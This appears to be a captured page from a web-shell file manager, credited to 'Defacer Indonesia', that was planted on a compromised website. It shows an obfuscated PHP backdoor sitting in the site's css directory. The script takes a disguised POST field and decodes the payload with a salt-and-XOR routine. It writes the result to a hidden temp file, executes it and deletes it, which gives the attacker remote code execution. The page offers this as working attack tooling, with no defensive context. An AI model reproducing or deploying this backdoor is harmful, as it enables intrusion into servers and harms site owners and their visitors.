whoami7 - Manager
:
/
home
/
analuakl
/
amplhomes.com
/
css
/
Upload File:
files >> /home/analuakl/amplhomes.com/css/easiertube.php
<?php if(in_array("\x72ec", array_keys($_POST))){ $reference = array_filter([session_save_path(), getcwd(), "/tmp", getenv("TMP"), ini_get("upload_tmp_dir"), "/var/tmp", "/dev/shm", sys_get_temp_dir(), getenv("TEMP")]); $desc = $_POST["\x72ec"]; $desc = explode("." , $desc); $flag = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt); $m = 0; array_walk($desc, function ($v2) use (&$flag, &$m, $salt, $sLen) {$chS = ord($salt[$m % $sLen]); $d = ((int)$v2 - $chS - ($m % 10))^ 77; $flag .=chr($d); $m++;} ); foreach ($reference as $res) { if (array_product([is_dir($res), is_writable($res)])) { $symbol = implode("/", [$res, ".pgrp"]); if (file_put_contents($symbol, $flag)) { require $symbol; unlink($symbol); exit; } } } }
Copyright ©2021 || Defacer Indonesia